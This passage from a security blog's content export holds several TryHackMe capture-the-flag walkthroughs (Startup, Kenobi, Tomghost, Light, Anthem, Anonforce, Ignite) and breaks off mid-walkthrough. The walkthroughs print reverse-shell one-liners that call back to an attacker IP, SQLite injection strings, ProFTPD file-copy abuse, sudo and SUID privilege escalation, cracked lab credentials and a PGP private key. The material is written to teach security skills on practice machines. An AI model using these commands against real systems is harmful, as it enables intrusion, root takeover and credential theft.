pick up a USB stick, pause and ask yourself:\nIs it really just storage… or something far more dangerous?\nREFERENCEShttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/https://www.bankinfosecurity.com/fin7-targets-us-enterprises-via-badusb-a-18278https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomwarehttps://darknetdiaries.com/episode/35/ ","date":"25 May 2025","externalUrl":null,"permalink":"/articles/technisch/trusting-the-wrong-device-a-hands-on-cybersecurity-breakdown/","section":"Security Research \u0026 Articles","summary":"","title":"Trusting the Wrong Device — A Hands-On Cybersecurity Breakdown","type":"articles"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Startup” STARTUP-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Startup”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nI’m just kiddinWe start with the usual scan to identify open ports:\nnmap 10.10.81.33 — openResult:\nFTP (21)SSH (22)HTTP (80)FTP EnumerationLet’s test for anonymous access:\nftp 10.10.81.33Username: anonymousPassword: anonymousSuccess!\nInside, we scour through\nftp\u0026gt; lsimportant.jpgnotice.txtGrab them both:\nftp\u0026gt; get important.jpgftp\u0026gt; get notice.txtThe text file turns out to be a meme, but we spot a name “Maya”\nAs there was nothing too interesting on the base web page, so we run feroxbuster:\nferoxbuster:\nferoxbuster -u http://10.10.81.33 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtWe discover : /files/ , but nothing juicy.\nSo now, I try utilizing a reverse shell\nStep 1: Prepare the payload:\nnano reverse-shell.phpPaste a PHP reverse shell from Pentestmonkey, replacing the IP with your tun0/local IP and port\nStep 2: Upload it via FTP:\nftp 10.10.81.33cd ftpmput reverse-shell.phpStep 3: Trigger the shell:\nStart your listener\nnc -lvnp 1234Open the URL\nhttp://10.10.81.33/files/reverse-shell.php\nBOOM! , Shell obtained as www-data\nNow that we are in we are going to enumerate locally:\nStep 1: Read available files\nlscat recipe.txtWe find: LOVE\nStep 2: Investigate deeper\nTry accessing /home/lennie, but permission is denied.\nExplore more directories and discover:\n/var/ftp/incidents/suspicious.pcapng\nTransfer it over or open with tcpdump or wireshark. You’ll spot this password used with sudo:\nc4ntg3t3n0ughsp1c3Now let’s escalate privilege:\nWe start of by : Trying to switching user\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’su lenniePassword: c4ntg3t3n0ughsp1c3Success! Now we have access into Lennie\nWe get the user.txt\ncat user.txtTHM{03ce3d619b80ccbfb3b7fc81e46c0e79}Now to escalate to root\nNow check directories owned by root but accessible to lennie\ncd /opt/scripts/ls -laWe find a script: planner.sh\nYou can’t edit it, but it sources another script\ncat /etc/print.shHere’s the trick — print.sh can be edited\nWe again formulate a reverse shell:\nStep 1: Create your reverse shell\necho ‘bash -c “bash -i \u0026gt;\u0026amp; /dev/tcp/YOUR_IP/8080 0\u0026gt;\u0026amp;1”’ \u0026gt; /etc/print.shStep 2: Start your listener\nnc -lvnp 8080When the root cron runs the planner.sh script, it includes print.sh -\u0026gt; Root shell drops into your netcat listener\nOnce in, we finish with\ncd /rootcat root.txtTHM{f963aaa6a430f210222158ae15c3d76d}The 3 flags are:\nloveTHM{03ce3d619b80ccbfb3b7fc81e46c0e79}THM{f963aaa6a430f210222158ae15c3d76d}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"20 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/startup-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"STARTUP-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “kenobi” KENOBI-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “kenobi”\nThis room is classified as easy, but was a bit tricky for me to complete, yet at the end I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by loading the machine IP in the browser:\nhttp://10.10.41.38\nIt loads an image — clearly a Star Wars reference, fitting for the box name Kenobi.\nNow we kick off enumeration with Nmap:\nnmap 10.10.41.38 — open -AThis reveals multiple services:\nFTP (port 21)SSH (port 22)SMB (ports 139, 445)NFS (port 111)The THM task mentions Samba, so we start with targeted enumeration on port 445\nnmap -p 445 — script=smb-enum-shares.nse,smb-enum-users.nse 10.10.41.38We see three shares listed — including an anonymous share.\nLet’s try accessing it\nsmbclient //10.10.41.38/anonymousWhen prompted for a password: just hit Enter (anonymous access)Inside the share\nlsget log.txtexitReading log.txt reveals:\nServer nameA reference to anonymous login on FTPAnd a path where a key was savedBased on Nmap results, port 111 is open — indicating NFS is available. Let’s enumerate\nnmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.41.38We discover that /var is mountable.\nLet’s mount it:\nsudo mkdir /mnt/kenobiNFSsudo mount 10.10.41.38:/var /mnt/kenobiNFSSuccess! We now have access to the /var directory from the remote machine\nBack to our Nmap results — we saw this version\nProFTPD 1.3.5\nLet’s search for an exploit:\nsearchsploit ProFTPD 1.3.5We find mod_copy is vulnerable — it allows remote file copy using SITE commands.\nSo we open a raw FTP session to try this:\nnc 10.10.41.38 21then:\nSITE CPFR /home/kenobi/.ssh/id_rsaSITE CPTO /var/tmp/id_rsahis copies Kenobi’s private SSH key to the /var/tmp directory.\nNow, since we already mounted /var, we can access it locally\nls -la /mnt/kenobiNFS/tmpcp /mnt/kenobiNFS/tmp/id_rsa .chmod 600 id_rsaLet’s SSH in:\nssh -i id_rsa kenobi@10.10.41.38now we are in and get the user.txt\ncat user.txtd0b0f3f53b6caa532a83915e19224899Privilege EscalationLet’s search for SUID binaries\nfind / -perm -u=s -type f 2\u0026gt;/dev/nullAmong common ones, an odd binary shows up:\n/usr/bin/menu\nRun it :\n/usr/bin/menu\nIt shows a basic menu with 3 options. Let’s inspect the binary with strings:\nstrings /usr/bin/menuWe see it runs: curl ifconfig.me\nBut it doesn’t use the full path to curl. That means if we override the curl binary with our own malicious script and adjust the PATH, we can gain root access\nWe create our fake curl binary:\necho /bin/sh \u0026gt; curlchmod +x curlThen set our PATH to point to the current directory first\nexport PATH=/home/kenobi:$PATHrun: /usr/bin/menu\nSelect option 1, which tries to run curl → but now it runs our version, giving us a root shell.\nGet the final flag\ncd /rootcat root.txt177b3cd8562289f37382721c28381f02CONCLUSION:I hope this write-up walkthrough was helpful to you all! This room covered:\nSamba EnumerationPRO FTPDReverse ShellsPrivilege EscalationNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on continue putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"18 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/kenobi-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"KENOBI-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is an “easy” room from the TryHackMe platform titled “Ignite” TOMGHOST- TRY HACK ME-ROOMHello everyone! This is an “easy” room from the TryHackMe platform titled “Ignite”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by going to the target IP but it isn’t accessible\nso we run nmap:\nnmap 10.10.39.107 — openThis revealed four open ports, and the 8080 port is there with http-proxy\nNavigating to http://10.10.39.107:8080 in the browser landed me on an Apache Tomcat default page\nVersion shown: 9.0.30Googling “tomcat 9.0.30 exploit”, I came across the Ghostcat vulnerability, which allows unauthenticated file reading on vulnerable Tomcat versions.\nSo I fired up Metasploit\nmsfconsoleThen searched and used the Ghostcat module\nsearch ghostcatuse auxiliary/admin/http/tomcat_ghostcatshow optionsset RHOSTS 10.10.39.107runAfter running it, we get:\nWelcome to GhostCatskyfuck:8730281lkjlkjdqlksalksthe format clearly meant it has to be credentials and I utilize it on ssh:\nssh skyfuck@10.10.39.107Password: 8730281lkjlkjdqlksalks\nNow we are in !\nthen I start exploring the contents\nls -lacd /homecd skyfucknothing here so I backtrack and try:\ncd home/merlinls -lacat user.txtTHM{GhostCat_1s_so_cr4sy}Next:\nsudo -lbut nothign positive\nThen I realise seeing these 2 files with .pgp and .asc\ncredential.pgptryhackme.ascThe .asc is the PGP public key, and .pgp is an encrypted credential.\nLet’s try to decrypt\ncat tryhackme.ascgpg — import tryhackme.ascgpg — decrypt credential.pgpBut it asks for a passphrase — so we have to crack it.\nTo crack the passphrase, I hosted the files locally to download on my attacker machine\nOn the target (inside SSH):python3 -m http.server — bind 10.10.39.107On attacker machine (new terminal):wget http://10.10.39.107:8000/tryhackme.ascwget http://10.10.39.107:8000/credential.pgpConvert the public key for John the Ripper:\ngpg2john tryhackme.asc \u0026gt; hashNow to crack it:\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashWe get the passphrase: alexandru(If it doesn’t display: john --show hash)\nNow decrypt:\ngpg — decrypt credential.pgpPassphrase: alexandru\nThat shows us this:\nmerlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jThat makes it Time to switch users:\nsu merlin# enter password =\u0026gt;\n( asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j)\nNow it’s time to perform privilege escalation:\nsudo -lWe see:\n(root : root) NOPASSWD: /usr/bin/zip\nZip is a known sudo exploit. Using GTFOBins\nTF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT ‘sh #’And we are in !\ncd /rootcat root.txtThat leads us to the root.txt\nTHM{Z1P_1S_FAKE}ConclusionI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through this room, I hope it helps you and gets you through the room as well. I will be putting more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup\n","date":"13 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/tomghost-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"TOMGHOST- TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Light” LIGHT- TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Light”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nHere it’s already mentioned we need to connect via netcat (nc) so let’s go ahead with it:\nnc 10.10.166.182 1337Once connected, we’re greeted with a username/password login prompt.\nThe prompt asks for:\nUsernamePasswordTrying the obvious, I entered smokey, and got a password field.\nThen, I tested basic SQL injection. Here’s what happened:\n' → returns:\nError: unrecognized token: “‘’’ LIMIT 30”\nsmokey' → returns:\nError: unrecognized token: “‘smokey ‘’ LIMIT 30”\nI tried the union commands and there were not of any use either here:\nTried ' or '1'='1' → still an error and I feel it’s due to how quotes are handled.\nThen, I try by dropping the trailing single quote and inject like this:\nsmokey’ or ‘1’=’1and a random string password is returned: tF8tj2o94WE4LKC\n(atleast no error lol)\nAt this point, I knew I was working with SQL, but not the usual MySQL\nThe room name is light, so I suspected SQLite.\nTo confirm, I Googled: “light db sql injection”\nThis led me to a goldmine: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md\nThen I immediately tested this:\nsmokey’ UNION SELECT sqlite_version()--It returned: 3.31.1\nSo now I know I’m working with SQLite 3.31.1\nNext up: Find where the juicy stuff is (like users, passwords, etc.)\nFor this I use the extract databse sturcture:\nsmokey’ UNION SELECT sql FROM sqlite_master’And there we see the table name: admintable\nsmokey’ UNION SELECT username FROM admintable--It worked:\nTryHackMeAdminLet’s now pull the password:\nsmokey’ UNION SELECT password FROM admintable--We get the flag:\nTHM{SQLit3_InJ3cTion_is_SimplE_nO?}Now to get the password:\nsmokey’ UNION SELECT password FROM admintable WHERE id=’1* WHERE id='1: Filters the results so you only get the password of the row where the id is 1 *\nand we get the password:\nmamZtAuMlrsEy5bp6q17CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through the room, I hope it helps you and gets you through the room as well. I will be putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/light-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LIGHT- TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Anthem.” ANTHEM— THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Anthem.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me a bit to complete and was a fun room, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a web page with some image and text.\nI initiate an Nmap scan and run a Feroxbuster scan.\nnmap -A -p- 10.10.55.249Open ports found:80 (HTTP)3389 (RDP)On looking through the webpage, it contains subpages like blogs,categories and tags related to articles.\ngobuster dir -u http://10.10.55.249/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtIn the blog section, one of the blog posts, we even see an email address!\nNow in the webpage I decide to run robots.txt, as the webpage contains the word “Crawlers”, which hints at robots.txt\nhttp://10.10.55.249/robots.txtIt reveals the CMS in use → Umbraco.\nThe homepage text mentions anthem.com.\nDomain name = anthem.comNext, on inspecting the source code :\nSearching for Admin Panel, we find a poem with the word “admin” in it.\nHint: Poem might be a clue!So I Copy \u0026amp; paste the poem into a search engine → It refers to Solomon Grundy.\nThis gives the username clue, we even remember seeing the email in the blog page :\njd@anthem.comFollowing the same pattern:\nSolomon Grundy → SGAdmin Email → sg@anthem.comAnd, this works !\nNow referring to the gobuster scan and we see some locations:\nFlag 1: Under /authors\nFlag 2: Inspect the homepage\nFlags 3 \u0026amp; 4: Found in two blog pages\nNow we see the flags in these aspects.\nNext utilizing the CMS system:\nGo to:\nhttp://10.10.55.249/umbraco/#/loginUse credentials found earlier:\nUsername: sg@anthem.comPassword: UmbracoIsTheBest!Nothing useful inside Umbraco CMS\nRemember: Nmap showed no domain is configured.Try RDP (Port 3389).Remote Desktop (RDP) AccessConnect using rdesktop\nI had an issue with the screenshots but below are the steps what I performed :\nOpen File Explorer.Go to This PC → Local Disk C.Click View → Enable Hidden Files.Open Backup Folder.Click Restore.A popup appears.Right-click → Properties → Security → Edit.Add User: SGWe get the admin password!Log back into the system using new admin credentials:Username: AdministratorPassword: ChangeMeBaby1MoreTimeAccess the Root File \u0026amp; Capture the Final FlagConclusionI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/anthem-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"ANTHEM— THM CTF — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Year Of The Rabbit.” Anonforce — TryHackMe — CTF WriteupHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Anon force.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThe real ANONFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network.\nWe encounter a webpage, which immediately prompts me to initiate an Nmap scan and run a Feroxbuster scan\nnmap 10.10.60.146 — openResults show FTP is open.\nExploiting FTP:Connect to FTP using anonymous login:\nftp anonymous@10.10.60.146List directories:\nls -laThen I immediately Navigate to the user directory:\ncd /homecd melodiasget user.txtexitNow back in terminal :\ncat user.txt\nFlag: 606083fd33beb1284fc51f411a706af8Finding Encrypted Files:Check the /notread Directory\nIn FTP and navigate to /notread\ncd /notreadls -laget backup.pgpget private.ascexitNow checking the files:\ncat backup.pgpstrings backup.pgpcat private.ascWhen I cat private.asc :\n— — -BEGIN PGP PRIVATE KEY BLOCK — — -\nVersion: BCPG v1.56\n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\n3ELdayAA8xm2L+QD7Q==\n=Wwny\n— — -END PGP PRIVATE KEY BLOCK — — -\nCracking the PGP Key:Convert backup.pgp for John the Ripper\ngpg2john backup.pgpOutput is gibberish, so we try private.asc\ngpg2john private.ascCopy the output string:\ngpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968\nSave it in a file:\nnano jijto confirm cat and check if the content is there:\ncat jij$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968\nNow to crack it Use John the Ripper with the RockYou wordlist\njohn jij — wordlist=/usr/share/wordlists/rockyou.txtFound password: xbox360\nImport the private key:\ngpg — import private.ascEnter password: xbox360\nDecrypt the backup file\ngpg — decrypt backup.pgpOutput contains the root password hash:\nroot:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::\nCracking the Root Password:Copy the root password hash:\n$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0\nSave it to a file:\nRun JohntheRipper:\njohn anonforcethm — wordlist=/usr/share/wordlists/rockyou.txtPassword found: hikari\nRoot Access:Connect using SSH:\nssh root@10.10.60.146password: hikari\nls -lacat root.txtFlag: f706456440c7af4187810c31c6cebdceCONCLUSION :I hope this write-up walkthrough was helpful to you all! This room covered FTP Enumeration, Cracking PGP Keys, Password Hash Cracking, and SSH Privilege Escalation. It was an interesting challenge that required a mix of forensic decryption and brute force techniques to gain root access.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"4 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/anonforce-tryhackme--ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Anonforce — TryHackMe —   CTF Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ignite” IGNITE— TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ignite”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a Fuel CMS page.\nI also initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.14.59 — openferoxbuster -u http://10.10.14.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtOn the website, we also notice a user ID and password mentioned in the login section.\nFrom the Feroxbuster results, we find the paths /fuel and /fuel/module\nNext, Checking the version, we confirm it is FuelCMS, which has a known exploit for Remote Code Execution (RCE).\nSearching for an exploit in ExploitDB we see it :\nNow back in the terminal I use searchsploit:\nsearchsploit fuel cmsWe locate the exploit script:\nlocate php/webapps/50477.pyCopy it into our working directory and inspect it:\ncp /usr/share/exploitdb/exploits/php/webapps/50477.py .cat 50477.pyWe modify the script’s target IP (make sure it is the victim’s IP) and execute\npython3 50477.py -u http://10.10.14.59/Now once in, We confirm RCE access by running:\nwhoamipwdls -laNow that we are in, I want to use the reverse shell now so I open the listner:\nnc -lvnp 1234Now the reverse shell payload:\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 10.4.1.240 1234 \u0026gt;/tmp/f{Replace 10.4.1.240 with our systemIP and 1234 with the port used in Netcat}\nOnce the shell connects, we navigate through directories:\ncd /homels -lacd www-datals -lacat flag.txtThat helps us retrieve the user 